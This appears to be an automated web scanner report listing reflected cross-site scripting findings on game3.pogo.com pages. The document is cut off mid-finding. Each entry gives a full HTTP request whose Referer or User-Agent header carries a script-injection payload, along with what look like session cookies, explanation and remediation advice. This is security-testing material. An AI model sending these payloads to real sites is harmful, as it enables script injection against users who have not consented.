GET /exhibit/game/game.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=dfd05</script><script>alert(1)</script>57005f1f7dd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 563d3</script><script>alert(1)</script>491f0c3cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/intermission.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=563d3</script><script>alert(1)</script>491f0c3cf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 162d4</script><script>alert(1)</script>71d830df306 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/loading/loading.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=162d4</script><script>alert(1)</script>71d830df306
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426d2</script><script>alert(1)</script>f5b0c4ef6b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=426d2</script><script>alert(1)</script>f5b0c4ef6b6 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6dd7</script><script>alert(1)</script>d5e3f275c69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/autoplay-table.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=a6dd7</script><script>alert(1)</script>d5e3f275c69
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd068</script><script>alert(1)</script>2fcbd332d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/chatshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=bd068</script><script>alert(1)</script>2fcbd332d20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aeb8</script><script>alert(1)</script>0cac953bca4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/controlshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=2aeb8</script><script>alert(1)</script>0cac953bca4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce6a2</script><script>alert(1)</script>79f70fb7d5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/dashshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=ce6a2</script><script>alert(1)</script>79f70fb7d5a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 804dd</script><script>alert(1)</script>f9fb6bee1c1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/frameset.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=804dd</script><script>alert(1)</script>f9fb6bee1c1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39631</script><script>alert(1)</script>d147f5bfa20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/game.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=39631</script><script>alert(1)</script>d147f5bfa20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b9b</script><script>alert(1)</script>8b1c40b04d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/gameshell.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=d7b9b</script><script>alert(1)</script>8b1c40b04d0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11234</script><script>alert(1)</script>444be4cd02c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/init.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=11234</script><script>alert(1)</script>444be4cd02c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d33b9</script><script>alert(1)</script>3100c016d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/jvmtest.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=d33b9</script><script>alert(1)</script>3100c016d20
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4313"><script>alert(1)</script>cb56d21662f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)</script>cb56d21662f Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57849</script><script>alert(1)</script>2e30affd4d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/loading.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=57849</script><script>alert(1)</script>2e30affd4d0
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c728b</script><script>alert(1)</script>38c7dbac39a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
function setVisible(elementName, visible) { elementToChangeState = getElementReference(elementName); //alert('found element ...[SNIP]... <param name="browserInfo" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c5e"><script>alert(1)</script>3ef13ef919 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: 73c5e"><script>alert(1)</script>3ef13ef919 Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d25a</script><script>alert(1)</script>e015009fb05 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/util/urlopen.jsp HTTP/1.1 Host: game3.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e; Referer: http://www.google.com/search?hl=en&q=4d25a</script><script>alert(1)</script>e015009fb05
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c14fe</script><script>alert(1)</script>03c013b122e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
